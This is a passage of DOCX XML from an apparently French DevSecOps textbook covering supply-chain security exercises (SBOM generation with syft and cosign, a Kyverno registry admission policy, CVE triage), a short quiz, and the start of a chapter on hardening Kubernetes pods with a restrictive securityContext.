        </w:tc>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Supprimer la dépendance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SÉCURISER LA CHAÎNE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Verrouiller les dépendances et vérifier leur provenance.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Générer un SBOM à chaque construction et l'archiver.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Signer les artefacts et attester la provenance.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Refuser à l'admission ce qui n'est pas signé.</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Savoir localiser une faille en minutes, pas en jours.</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chaîne va du commit à l'admission dans le cluster.</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dépendance est du code exécuté avec vos droits.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SBOM inventorie les composants d'un artefact.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SBOM non archivé ne sert à rien lors d'une alerte.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signature prouve l'origine, la provenance décrit la construction.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politique d'admission refuse les artefacts non conformes.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On déploie une empreinte, pas une étiquette.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politique s'active d'abord en audit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La chaîne est sécurisée. Le chapitre suivant met tout en pratique dans un projet complet.</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90.1 — Générer et archiver un SBOM</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Chaque version publiée doit être inventoriée.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Générez le SBOM.</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Attachez-le à l'image.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sa présence.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 90.2 — Écrire une politique d'admission</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   SÉCURITÉ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Seules les images signées du registre interne sont autorisées.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Ciblez le registre.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Vérifiez la signature.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Activez en audit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 90.3 — Traiter une alerte de vulnérabilité</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   INCIDENT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une CVE critique touche une bibliothèque présente dans six images.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Localisez les images.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Évaluez l'exposition.</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Corrigez et consignez.</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90.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>syft registry.exemple.fr/app:1.4.2 -o cyclonedx-json &gt; app.sbom.json</w:t>
        <w:br/>
        <w:t>cosign attach sbom --sbom app.sbom.json registry.exemple.fr/app:1.4.2</w:t>
        <w:br/>
        <w:t>cosign download sbom registry.exemple.fr/app:1.4.2 | jq '.components | length'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le SBOM se génère à partir de l'image publiée, pas du dépôt : c'est elle qui sera exécutée.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>L'archivage avec l'artefact garantit qu'il reste disponible pendant toute la durée de vie de la version.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 90.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>apiVersion: kyverno.io/v1</w:t>
        <w:br/>
        <w:t>kind: ClusterPolicy</w:t>
        <w:br/>
        <w:t>metadata: { name: registre-interne }</w:t>
        <w:br/>
        <w:t>spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  validationFailureAction: Audit     # puis Enforce</w:t>
        <w:br/>
        <w:t xml:space="preserve">  rules:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    - name: images-du-registre</w:t>
        <w:br/>
        <w:t xml:space="preserve">      match:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        any: [{ resources: { kinds: [Pod] } }]</w:t>
        <w:br/>
        <w:t xml:space="preserve">      validate:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        message: "Seules les images de registry.exemple.fr sont autorisées."</w:t>
        <w:br/>
        <w:t xml:space="preserve">        pattern:</w:t>
        <w:br/>
        <w:t xml:space="preserve">          spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            containers:</w:t>
        <w:br/>
        <w:t xml:space="preserve">              - image: "registry.exemple.fr/*"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le mode audit produit des rapports sans bloquer : c'est la phase d'observation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La règle porte sur la référence complète, préfixe compris.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 90.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>1. Interrogation des SBOM : 6 images concernées (1.3.x, 1.4.0-1.4.2)</w:t>
        <w:br/>
        <w:t>2. Exposition : la fonction vulnérable sert au décodage d'images téléversées</w:t>
        <w:br/>
        <w:t xml:space="preserve">   → chemin atteignable depuis Internet</w:t>
        <w:br/>
        <w:t>3. Décision : correction immédiate</w:t>
        <w:br/>
        <w:t>4. Reconstruction en 1.4.3, signature, publication</w:t>
        <w:br/>
        <w:t>5. Déploiement progressif, vérification des journaux</w:t>
        <w:br/>
        <w:t>6. Consignation : fenêtre du 2026-09-02 au 2026-10-19, analyse publiée</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La question de l'atteignabilité décide de l'urgence réelle.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La fenêtre d'exposition est une information obligatoire pour l'analyse.</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Qu'est-ce qu'un SBOM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Un certificat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Un inventaire de composants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Une signature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Un registre</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 prouve une attestation de provenance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L'absence de faille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Comment l'artefact a été construit</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La qualité du code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La conformité RGPD</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Pourquoi déployer une empreinte plutôt qu'une étiquette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C'est plus court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L'étiquette peut être redéployée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C'est plus rapide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Pour le cache</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Par quel mode commencer une politique d'admission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Enforce</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Audit</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Disabled</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Warn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> uniquement</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Première étape face à une CVE critique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Reconstruire tout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Localiser les artefacts concernés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Attendre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Désactiver les alertes</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Il liste les bibliothèques et leurs versions.</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Elle décrit le dépôt, le commit et le pipeline.</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L'empreinte identifie un contenu immuable.</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L'audit révèle les écarts sans bloquer les livraisons.</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Les SBOM permettent de savoir quelles versions sont touchées.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>91. Durcissement des conteneurs et du cluster</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Réduire ce qu'un conteneur peut faire, pour réduire ce qu'une faille peut coûter.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 3 h 15 · Niveau : Avancé · Prérequis : chapitre 90</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Connaître les frontières d'isolation réelles.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Écrire un contexte de sécurité de pod.</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Restreindre les capacités et le système de fichiers.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Isoler le réseau entre espaces de noms.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Vérifier un durcissement au lieu de le supposer.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>91.1 Ce qu'un conteneur n'isole pas</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un conteneur n'est pas une machine virtuelle : il partage le noyau de l'hôte. Les frontières sont des espaces de noms et des groupes de contrôle, pas une barrière matérielle.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.359 — Cinq frontières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0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Ressource</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Isolée par</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="309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Faille possible</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Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Système de fichiers</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Montages et racine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3091"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Écriture hors volume</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Processus</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Espace de noms PID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Orphelins sur l'hôte</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Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Réseau</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Espace de noms réseau</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3091"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Contournement par l'hôte</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Utilisateur</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Espace de noms utilisateur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Exécution en root</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Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Noyau</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Partagé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3091"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Faille de noyau = évasion</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ÉVASION DE CONTENEUR</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Exploitation d'une faille ou d'une configuration permissive permettant à un processus de sortir de son conteneur et d'accéder à l'hôte.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="3365500"/>
            <wp:docPr id="108" name="Picture 108"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f106.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId148"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="3365500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.106 — Couches de durcissement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>91.2 Contexte de sécurité</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Kubernetes permet de déclarer précisément les droits d'un conteneur. Les valeurs par défaut sont permissives : il faut les restreindre explicitement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un pod durci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apiVersion: v1</w:t>
        <w:br/>
        <w:t>kind: Pod</w:t>
        <w:br/>
        <w:t>metadata:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  name: api</w:t>
        <w:br/>
        <w:t xml:space="preserve">  namespace: boutique</w:t>
        <w:br/>
        <w:t>spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  securityContext:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    runAsNonRoot: true</w:t>
        <w:br/>
        <w:t xml:space="preserve">    runAsUser: 10001</w:t>
        <w:br/>
        <w:t xml:space="preserve">    runAsGroup: 10001</w:t>
        <w:br/>
        <w:t xml:space="preserve">    fsGroup: 10001</w:t>
        <w:br/>
        <w:t xml:space="preserve">    seccompProfile:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      type: RuntimeDefault</w:t>
        <w:br/>
        <w:t xml:space="preserve">  containers:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    - name: api</w:t>
        <w:br/>
        <w:t xml:space="preserve">      image: registry.exemple.fr/boutique:1.4.2</w:t>
        <w:br/>
        <w:t xml:space="preserve">      securityContext:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        allowPrivilegeEscalation: false</w:t>
        <w:br/>
        <w:t xml:space="preserve">        readOnlyRootFilesystem: true</w:t>
        <w:br/>
        <w:t xml:space="preserve">        capabilities:</w:t>
        <w:br/>
        <w:t xml:space="preserve">          drop: ["ALL"]</w:t>
        <w:br/>
        <w:t xml:space="preserve">      volumeMounts:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        - name: temporaire</w:t>
        <w:br/>
        <w:t xml:space="preserve">          mountPath: /tmp</w:t>
        <w:br/>
        <w:t xml:space="preserve">        - name: cache</w:t>
        <w:br/>
        <w:t xml:space="preserve">          mountPath: /app/.cache</w:t>
        <w:br/>
        <w:t xml:space="preserve">  volumes:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    - name: temporaire</w:t>
        <w:br/>
        <w:t xml:space="preserve">      emptyDir: { sizeLimit: 64Mi }</w:t>
        <w:br/>
        <w:t xml:space="preserve">    - name: cache</w:t>
        <w:br/>
        <w:t xml:space="preserve">      emptyDir: { sizeLimit: 256Mi }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.360 — Cinq réglages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55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Réglage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="292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Empêche</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="253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 de bord</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3555"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>runAsNonRoot</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2920"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Exécution en root</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2539"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Image non compatible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="355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readOnlyRootFilesystem</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="292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Écriture hors volume</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="253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Journaux à rediriger</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3555"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>drop: ALL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2920"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Capacités inutiles</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2539"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Besoin explicite à ajouter</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="355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allowPrivilegeEscalation: false</w:t>
